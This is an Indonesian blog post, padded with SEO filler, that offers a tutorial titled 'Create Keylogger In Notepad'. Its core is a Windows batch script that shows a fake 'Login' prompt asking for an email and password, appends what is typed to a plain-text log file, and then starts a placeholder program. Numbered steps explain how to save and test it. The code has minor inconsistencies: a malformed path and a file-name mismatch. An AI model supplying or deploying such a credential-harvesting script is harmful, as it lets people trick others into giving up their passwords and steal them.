Sedikit Info Seputar
Record computer keystrokes | Create Keylogger In Notepad
Terbaru 2017
- Hay gaes kali ini team Just Sharing Info, kali ini akan membahas artikel dengan judul Record computer keystrokes | Create Keylogger In Notepad, kami selaku Team Just Sharing Info telah mempersiapkan artikel ini untuk sobat sobat yang menyukai Just Sharing Info. semoga isi postingan tentang
Artikel Tech Diary, yang saya posting kali ini dapat dipahami dengan mudah serta memberi manfa'at bagi kalian semua, walaupun tidak sempurna setidaknya artikel kami memberi sedikit informasi kepada kalian semua. ok langsung simak aja sob
Judul:
Berbagi Info Seputar
Record computer keystrokes | Create Keylogger In Notepad
Terbaru
link: Record computer keystrokes | Create Keylogger In Notepad
Berbagi Record computer keystrokes | Create Keylogger In Notepad Terbaru dan Terlengkap 2017
Create Keylogger in Notepad & Record Computer keystrokes
Creating Keylogger With Notepad
- Just open the notepad from the start menu. Copy and paste the below given code into the notepad.
color a
title Login
cls
echo Please Enter Your Email Address And Password
echo.
echo.
cd “C:Activity”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
exit
- Save this file on the desktop as a logs.bat file.
- Now create the folder named the activity and paste it into c drive. Note that keylogger will not work if you named the folder something else.
- Now test your logs.bat file by entering the username and password.
- To check logs open the folder activity and there you will find the text file named logs.txt.